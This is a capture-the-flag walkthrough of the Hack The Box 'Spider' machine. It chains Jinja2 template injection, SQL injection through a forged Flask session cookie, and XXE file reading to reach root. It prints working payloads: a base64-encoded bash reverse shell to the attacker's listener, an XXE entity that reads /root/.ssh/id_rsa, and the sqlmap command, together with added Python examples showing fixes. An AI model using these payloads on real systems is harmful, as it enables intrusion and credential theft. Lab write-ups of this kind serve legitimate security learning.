Hack-The-Box-walkthrough[spider]

Introduction

OS: Linux
Difficulty: Hard
Points: 40
Release: 29 May 2021
IP: 10.10.10.243


Recon

Using nmap:

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.243
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two ports are open: 22 (ssh) and 80 (http).

Port-80

It redirects to spider.htb.

Let's add spider.htb to the /etc/hosts file:

10.10.10.243    spider.htb

Now let’s go to spider.htb.

I found the username chiv inside the Black Chair template.

Now let's register ourselves.

Log in with the password we used at registration.

Now we are logged in, but we can't access the admin page. Let's check the user information page.

Our username is reflected here. We can't change the username of an existing account, but we can try SSTI (Server-Side Template Injection) in the username field, so let's register again with the username {{7*7}}.

Register with the username {{7*7}}.

Now let's check on the user information page whether our payload worked.

http://spider.htb/user

It worked 😃, we get the output 49.

This means the server is running Jinja2 or Flask. Now let's try to read the config with {{config}}.

Register with the username {{config}}.

If we check the user information page, we get the config, which contains the SECRET_KEY:

<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'RATELIMIT_ENABLED': True, 'RATELIMIT_DEFAULTS_PER_METHOD': False, 'RATELIMIT_SWALLOW_ERRORS': False, 'RATELIMIT_HEADERS_ENABLED': False, 'RATELIMIT_STORAGE_URL': 'memory://', 'RATELIMIT_STRATEGY': 'fixed-window', 'RATELIMIT_HEADER_RESET': 'X-RateLimit-Reset', 'RATELIMIT_HEADER_REMAINING': 'X-RateLimit-Remaining', 'RATELIMIT_HEADER_LIMIT': 'X-RateLimit-Limit', 'RATELIMIT_HEADER_RETRY_AFTER': 'Retry-After', 'UPLOAD_FOLDER': 'static/uploads'}>

Now let's try to dump the database with sqlmap, using this SECRET_KEY to sign the session cookie.

But first install the requirement needed to use that SECRET_KEY:

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# pip3 install flask_unsign
Collecting flask_unsign
Downloading flask-unsign-0.1.0.tar.gz (14 kB)
Requirement already satisfied: flask in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.2)
Requirement already satisfied: itsdangerous in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.0)
Requirement already satisfied: markupsafe in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from flask_unsign) (2.25.1)
Requirement already satisfied: werkzeug in /usr/lib/python3/dist-packages (from flask_unsign) (1.0.1)
Building wheels for collected packages: flask-unsign
Building wheel for flask-unsign (setup.py) ... done
Created wheel for flask-unsign: filename=flask_unsign-0.1.0-py3-none-any.whl size=13473 sha256=4168d0cfaed3b2508b4cb3d43f3a3f8f0786e931388d95ba5d46e2e7fa29c6fe
Stored in directory: /root/.cache/pip/wheels/81/5a/d6/17703dd669250a72d9985b79b419f38307ba20678f71daadeb
Successfully built flask-unsign
Installing collected packages: flask-unsign
Successfully installed flask-unsign-0.1.0

Now we're all set, let's run sqlmap.

  • Important: answer "Y" to sqlmap's first question and "n" to the ones after that.
┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.4#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:09:40 /2021-06-04/

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[10:09:42] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:09:42] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:09:42] [INFO] testing connection to the target URL
[10:09:44] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[10:09:47] [INFO] target URL content is stable
[10:09:47] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] n
[10:09:49] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[10:09:51] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[10:09:52] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[10:09:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:10:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:10:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:10:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:10:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:10:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:10:35] [INFO] testing 'Generic inline queries'
[10:10:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:10:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:10:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:10:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:11:11] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:11:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:11:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:12:00] [INFO] target URL appears to be UNION injectable with 1 columns
[10:12:03] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session=' AND (SELECT 1456 FROM (SELECT(SLEEP(5)))zGio) AND 'IMkG'='IMkG

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: session=' UNION ALL SELECT CONCAT(0x7162717a71,0x477a7a5770686c685a45574950634d4446784e46646d594a4c664f75705a787175564d6c4e72484b,0x716a626271)-- -
---
[10:12:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[10:12:20] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:12:20] [INFO] fetching current database
[10:12:21] [INFO] fetching tables for database: 'shop'
[10:12:22] [INFO] fetching columns for table 'items' in database 'shop'
[10:12:24] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name | price | image_path | description |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 3 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 5 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+

[10:12:25] [INFO] table 'shop.items' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/items.csv'
[10:12:25] [INFO] fetching columns for table 'users' in database 'shop'
[10:12:26] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[4 entries]
+----+--------------------------------------+------------+-----------------+
| id | uuid | name | password |
+----+--------------------------------------+------------+-----------------+
| 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | ch1VW4sHERE7331 |
| 2 | 9a13e0f6-ee27-4968-908f-0d9882c1f28a | lucifer11 | lucifer11 |
| 3 | dc63b342-e0d0-4503-945b-71a3cf365f8e | {{7*7}} | {{7*7}} |
| 4 | 38af247a-100f-4712-81c0-5ac1b95e8a95 | {{config}} | {{config}} |
+----+--------------------------------------+------------+-----------------+

[10:12:28] [INFO] table 'shop.users' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/users.csv'
[10:12:28] [INFO] fetching columns for table 'support' in database 'shop'
[10:12:29] [INFO] fetching entries for table 'support' in database 'shop'
[10:12:32] [INFO] fetching number of entries for table 'support' in database 'shop'
[10:12:32] [INFO] retrieved:
[10:12:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[10:14:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
0
[10:14:15] [WARNING] table 'support' in database 'shop' appears to be empty
Database: shop
Table: support
[0 entries]
+------------+---------+---------+-------------+
| support_id | contact | message | timestamp |
+------------+---------+---------+-------------+
+------------+---------+---------+-------------+

[10:14:15] [INFO] table 'shop.support' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/support.csv'
[10:14:15] [INFO] fetching columns for table 'messages' in database 'shop'
[10:14:16] [INFO] fetching entries for table 'messages' in database 'shop'
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message | timestamp |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1 | 1 | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+

[10:14:17] [INFO] table 'shop.messages' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/messages.csv'
[10:14:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 84 times
[10:14:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/spider.htb'

[*] ending @ 10:14:17 /2021-06-04/

I got the uuid and password of chiv:

| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv       | ch1VW4sHERE7331 |
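As an added example (not code from the original post), the following Python shows why the SECRET_KEY leaked through {{config}} was enough for sqlmap: a session cookie's signature only proves it was produced with the key, so once the key is public the application must still treat the uuid inside the cookie as untrusted input. The signing here is a simplified HMAC stand-in for itsdangerous (not its real wire format), the table row is constructed, and the vulnerable lookup interpolates the uuid into SQL the way the UNION probe above exploited, while the safe one binds it as a parameter.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

# Constructed key for this demo; on the box the real one leaked through {{config}}.
SECRET_KEY = "demo-secret-key"

def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_session(data: dict, key: str) -> str:
    """Simplified stand-in for Flask's itsdangerous cookie: '<payload>.<hmac>' (not the real format)."""
    payload = _b64(json.dumps(data, sort_keys=True).encode())
    sig = hmac.new(key.encode(), payload.encode(), hashlib.sha256).digest()
    return f"{payload}.{_b64(sig)}"

def verify_session(cookie: str, key: str):
    """Return the session dict when the signature matches, else None."""
    if "." not in cookie:
        return None
    payload, sig = cookie.rsplit(".", 1)
    expected = hmac.new(key.encode(), payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64(sig)):
        return None
    return json.loads(_unb64(payload))

def make_db() -> sqlite3.Connection:
    """In-memory table with the page's shop.users columns and one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, uuid TEXT, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, '00000000-0000-4000-8000-000000000001', 'alice', 'pw')")
    return conn

def lookup_name_vulnerable(conn: sqlite3.Connection, uuid: str) -> list:
    # The bug sqlmap found: a value taken from the (signed) cookie is pasted straight into SQL.
    return conn.execute(f"SELECT name FROM users WHERE uuid = '{uuid}'").fetchall()

def lookup_name_safe(conn: sqlite3.Connection, uuid: str) -> list:
    # Parameter binding: the same string is compared as data and never parsed as SQL.
    return conn.execute("SELECT name FROM users WHERE uuid = ?", (uuid,)).fetchall()

def demo() -> dict:
    conn = make_db()
    # Same shape as sqlmap's UNION probe on the page, carried in a cookie forged with the leaked key.
    forged = sign_session({"uuid": "' UNION ALL SELECT 'injected'-- -"}, SECRET_KEY)
    session = verify_session(forged, SECRET_KEY)  # passes: the signature only says who held the key
    return {
        "signature_ok": session is not None,
        "vulnerable": lookup_name_vulnerable(conn, session["uuid"]),  # [('injected',)]
        "safe": lookup_name_safe(conn, session["uuid"]),              # []
    }

if __name__ == "__main__":
    print(demo())
```

Rotating the key invalidates every forged cookie, but only parameter binding (and not trusting the cookie's contents) removes the injection itself.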

Now let's log in as chiv.

Now we have access to the admin page; let's check the messages.

We got the link to the portal that the message says needs fixing. Let's go to that link and see what is there.

http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal

There is a support portal that we are supposed to fix, which means there is a problem in the support portal.

After some trial and error I got the correct payload for a reverse shell.

  • Server Side Template Injection
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC45LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}

Just replace the base64 string with one encoding your own IP and port (encode it with base64 again) and paste it into the payload.

Then start your netcat listener on the port you put in the payload.

Now add the payload in both parameters and submit the request.

If we check our netcat listener, we have a shell as chiv.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.243.
Ncat: Connection from 10.10.10.243:43612.
bash: cannot set terminal process group (1386): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$ id
id
uid=1000(chiv) gid=33(www-data) groups=33(www-data)
chiv@spider:/var/www/webapp$ whoami
whoami
chiv
chiv@spider:/var/www/webapp$ cd
cd
chiv@spider:~$ ls
ls
user.txt
chiv@spider:~$ cat user.txt
cat user.txt
752a1885aef326b3d705f0b7ca531e4b

And if we go into the /home/chiv/.ssh directory, we find the id_rsa key.

chiv@spider:~/.ssh$ ls -la
ls -la
total 16
drwx------ 2 chiv chiv 4096 May 6 11:42 .
drwxr-xr-x 6 chiv chiv 4096 May 18 00:23 ..
-rw-r--r-- 1 chiv chiv 393 May 4 15:42 authorized_keys
-rw------- 1 chiv chiv 1679 Apr 24 2020 id_rsa
chiv@spider:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Now let's switch from the reverse shell to an SSH shell.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# ssh -i user chiv@10.10.10.243
The authenticity of host '10.10.10.243 (10.10.10.243)' can't be established.
ECDSA key fingerprint is SHA256:Z0c/GTs+BeZXyXf2c/kRC1Y+omqtI1wPaEfrz0vvYCM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.243' (ECDSA) to the list of known hosts.
Last login: Fri May 21 15:02:03 2021 from 10.10.14.7
chiv@spider:~$ id
uid=1000(chiv) gid=1000(chiv) groups=1000(chiv)
chiv@spider:~$ whoami
chiv
chiv@spider:~$ cat user.txt
752a1885aef326b3d705f0b7ca531e4b

Privilege escalation

Let's run linPEAS.

After analyzing the linPEAS output I found a service running on localhost on port 8080.

To access port 8080 we need to forward the port:

ssh -i user -L 9002:localhost:8080 chiv@spider.htb

Now let's open Firefox and go to localhost:9002.

We get the beta login page.

Let's sign in with any username.

This is a shopping cart page where no links work except logout, and our username is reflected.

If we look at the cookies, we see a session cookie; let's try to decode it.

I used flask-unsign to decode it.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# flask-unsign --decode --cookie .eJxNjsFPgzAchf8V07OH1rGDHJGWyaSkhV8LvYE1KYMimU1kLvvf3RJjdnz58r73zmha_YTiM3roUYyAcmbpWosxV1KHWXmiP3Rx6ndm6IBFdbYkFkgqGlmoVL4BdXvrX3-gCumVzxXwpGTLTh4Sc-O3bPCUCm1zgWlkmCv7jAeu3aAIHNvR6c6zRvv10I0qAlpsi-uemqehB4P1JHD13__zZ6ytvTGK5LhV73iPCbUb4zTdeq1sZTPW8Je7P_T7BN6NEsNRPC0b63koGzPKVDyjyyNaPoc5fKEYX34BWehYFw.YLo7NA.ZN0R3IrwiVI3inmmeoi3SoM5COw
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+bHVjaWZlcjExPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}
┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# echo -n PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+bHVjaWZlcjExPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4= | base64 -d
<!-- API Version 1.0.0 -->
<root>
<data>
<username>lucifer11</username>
<is_admin>0</is_admin>
</data>
</root>

We also see a hidden value in the login page source.

So we can try XXE (XML External Entity injection).

  • Link: XXE Cheatsheet – XML External Entity Injection

After analysing this, I worked out that we need to put our payload in the hidden version field, and the output shows up in the username field, because the username is reflected after we log in.

After some trial and error I got LFI, and I can read files inside the root directory, so let's get root's id_rsa key.

For that I intercepted the login request in Burp and added this payload (URL-encoded as sent, and decoded below it):

username=%26username%3b&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

username=&username;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--
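As an added example (not the portal's own code), the following Python reconstructs how the beta portal presumably builds the XML seen in the decoded cookie (an assumption based on that cookie, not the app's source) and shows the two fixes that close this XXE: validate the version field and build the XML with ElementTree so the username is escaped, and refuse any DOCTYPE or ENTITY in the cookie document before it reaches a parser. The test input is the page's own payload.

```python
import base64
import re
import xml.etree.ElementTree as ET

VERSION_RE = re.compile(r"\d+\.\d+\.\d+")
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)

# The page's payload: the version value closes the comment and opens a DTD that defines &username;.
XXE_VERSION = '1.0.0--><!DOCTYPE foo [<!ENTITY username SYSTEM "/root/.ssh/id_rsa"> ]><!--'

def build_document_vulnerable(username: str, version: str) -> str:
    """Assumed reconstruction of the portal's XML (matches the decoded cookie): raw string formatting."""
    return (f"<!-- API Version {version} -->\n<root>\n    <data>\n"
            f"        <username>{username}</username>\n        <is_admin>0</is_admin>\n"
            "    </data>\n</root>")

def build_document_safe(username: str, version: str) -> str:
    """Hardened builder: strict version check, and ElementTree escapes &, < and > in the username."""
    if not VERSION_RE.fullmatch(version):
        raise ValueError("version must look like 1.0.0")
    root = ET.Element("root")
    data = ET.SubElement(root, "data")
    ET.SubElement(data, "username").text = username
    ET.SubElement(data, "is_admin").text = "0"
    return f"<!-- API Version {version} -->\n" + ET.tostring(root, encoding="unicode")

def cookie_xml_is_acceptable(lxml_b64: str) -> bool:
    """Guard for the base64 'lxml' cookie value: refuse any DTD before it reaches an XML parser."""
    doc = base64.b64decode(lxml_b64).decode("utf-8", "replace")
    return DTD_RE.search(doc) is None

def demo() -> dict:
    def to_cookie(doc: str) -> str:
        return base64.b64encode(doc.encode()).decode()

    vulnerable = build_document_vulnerable("&username;", XXE_VERSION)
    safe = build_document_safe("&username;", "1.0.0")
    try:
        build_document_safe("&username;", XXE_VERSION)
        version_rejected = False
    except ValueError:
        version_rejected = True
    return {
        "vulnerable_has_dtd": "<!DOCTYPE" in vulnerable,    # True: DTD injected through the version field
        "safe_escapes_entity": "&amp;username;" in safe,    # True: the reference is inert text
        "version_rejected": version_rejected,               # True
        "guard_blocks_vulnerable": not cookie_xml_is_acceptable(to_cookie(vulnerable)),  # True
        "guard_allows_safe": cookie_xml_is_acceptable(to_cookie(safe)),                  # True
    }

if __name__ == "__main__":
    print(demo())
```

The guard is defence in depth; the parser that reads the cookie should also be configured not to resolve entities (for lxml, resolve_entities=False on the XMLParser).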

Boom 🧨, we got root's id_rsa.

View the page source to get the id_rsa properly formatted.

  • root_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Now let's save the id_rsa, ssh in and get root.txt.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# ssh -i root_rsa root@10.10.10.243
Last login: Mon May 31 13:58:50 2021
root@spider:~# id
uid=0(root) gid=0(root) groups=0(root)
root@spider:~# whoami
root
root@spider:~# ls
root.txt
root@spider:~# cat root.txt
6dee7d55ac7082e677f515981ce678c7

Summary of knowledge

  • use sqlmap --eval with the leaked config SECRET_KEY for session-cookie SQL injection
  • Server Side Template Injection to get a reverse shell
  • use XML External Entity Injection to get LFI and read the root id_rsa key

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a CTFer, reverse engineer, IoTer, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…